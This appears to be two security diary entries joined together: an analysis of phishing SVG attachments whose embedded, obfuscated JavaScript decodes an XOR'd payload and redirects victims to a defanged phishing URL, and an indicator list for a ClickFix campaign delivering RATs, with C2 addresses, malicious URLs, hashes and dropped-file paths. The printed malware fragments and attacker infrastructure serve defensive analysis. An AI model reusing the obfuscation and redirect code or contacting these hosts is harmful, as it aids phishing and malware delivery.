For a few days, my SANS ISC mailbox is flooded with emails that delivers SVG files. An SVG ("Scalable Vector Graphic") is a web-friendly vector file format used for graphics and icons. No URL in the body, just “an image”, that’s the perfect way to deliver some malicious content. This isn’t the first time that we see this technique used by threat actors[1].

This time, the SVG files are really simple and even don’t contain any graphical element but a simple piece of JavaScript that will redirect the victim's browser to the phishing page:

With the current wave, I just detected regular phishing pages but it could be any payload.

The variable “nl” contains the targeted email address:

nl = '$aGFuZGxlcnNAc2Fucy5lZHU='; // “handlers@sans.edu”

The interesting payload is in “oa”, it contains a Base64-encode and XOR’d string. The XOR key is in “bd”:

const pt = "b19208caeefa";
const rm = "51d1e7dcd384";
const bd = pt + rm;

The payload is decoded here:

const cx = ['b', 'style', 'o', 't', 'a'];
const kf = self[[cx[4], cx[3], cx[2], cx[0]].join('')];
const ts = kf(oa);
const rabbit = Uint8Array.from(ts, (aa, ak) =>
    aa.charCodeAt(0) ^ bd.charCodeAt(ak % bd.length)
);

Finally, the variable “rabbit” is used to perform the redirect in the browser:

window.location.href = "hxxps://chinougoo[.]cfd/W74rH61S!x7sbhhS0bKPv/" + "handlers@sans.edu";

This technique works because SVG files are handled by the browser by default on the Windows operating system. Note the TLD used (".cfd") which means "Clothing, Fashion, and Design". It's a cheap TLD more and more abused in phishing campaigns[2]. 

A final note about the MIME type used in the SVG file: 

<script type="application/ecmascript">

This is a official MIME type for ECMAScript, the standardized specification underlying JavaScript (standard ECMA-262)[3]. This has been used probably to defeat some common security controls that are looking for "JavaScript".

[1] https://isc.sans.edu/diary/Increase+In+Phishing+SVG+Attachments/31456
[2] https://radar.cloudflare.com/tlds/cfd?dateRange=7d
[3] https://github.com/sudheerj/ECMAScript-features

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

Introduction

This diary provides indicators from an unidentified RAT infection on Wednesday 2026-05-27 that was followed by a malicious NetSupport Manager RAT package. This originated from the SmartApeSG ClickFix campaign. I still don't know the name of the initial RAT, but it has consistently been generating encoded (not HTTPS/SSL/TLS) traffic to a command and control (C2) server at 89.110.110[.]119 over TCP port 443 since I first noticed it sometime in April 2026.

Images from the infection

Shown above: Fake verification page with ClickFix instructions from the SmartApeSG campaign.

Shown above: Initial RAT malware on an infected Windows host.

Shown above: Follow-up files for NetSupport RAT sent through the initial RAT C2 traffic.

Shown above: NetSupport RAT C2 traffic.

Indicators of Compromise

Example of SmartApeSG URLs seen on Wednesday 2026-05-27:

• hxxps[:]//hiddenplanetlab[.]top/signin/secure-util.js
• hxxps[:]//hiddenplanetlab[.]top/signin/private-template?c66kjD5i
• hxxps[:]//hiddenplanetlab[.]top/signin/legacy-worker.js?18b3825af007e53d

Example of traffic generated by running the associated ClickFix script:

• hxxp[:]//178.156.165[.]82/
• hxxp[:]//178.156.173[.]194/
• hxxps[:]//silverharvestnetwork[.]com/check

Initial RAT C2 traffic:

• tcp[:]//89.110.110[.]119:443/

IP address for NetSupport RAT C2 server:

• hxxp[:]//185.163.47[.]217:443

Files from the infection:

SHA256 hash: 1514b1268e9dc6d2f37137aa38c756cb4bf8186ac9235d6863b78e7f8bbbe976

• File size: 26,555,757 bytes
• File type: Zip archive data, at least v2.0 to extract
• File location: hxxps[:]//silverharvestnetwork[.]com/check
• File description: Zip archive containing software package for the initial RAT.

SHA256 hash: 469bac8e10f50263e8ff0806e6ba126bb4cc660799129a8653eab3f8ec7201e5

• File size: 109 bytes
• File type: ASCII text
• File location: C:\ProgramData\processor.vbs
• File description: Initial script that runs token.bat

SHA256 hash: 9c7eda2c4d3aaa8746495741bef57a07de180f0409409faf0f91658e88ba33f5

• File size: 8,262 bytes
• File type: DOS batch file text, ASCII text, with very long lines
• File location: C:\ProgramData\token.bat
• File description: Batch scrip that extracts, runs, and makes persistent NetSupport RAT from setub.cab

SHA256 hash: 7ba5481c873bb3081442561f749f590badd72ef249fddfe993e30b28dc0c2112

• File size: 17,275,805 bytes
• File type: Microsoft Cabinet archive data
• File location: C:\ProgramData\setup.cab
• File description: CAB file containing malicious NetSupport RAT package
• Contents of this CAB file extracted to: C:\ProgramData\UpdateInstaller\

Note 1: The files processor.vbs, token.bat, and setup.cab are all deleted by the token.bat script after it installs the malicious NetSupport RAT package and makes it persistent on the infected Windows host.

Note 2: The indicators for this activity (domains, file hashes, etc.) change on a daily basis. For more up-to-date indicators on SmartApeSG and similar campaigns, see the @monitorsg feed on Mastodon.

---
Bradley Duncan
brad [at] malware-traffic-analysis.net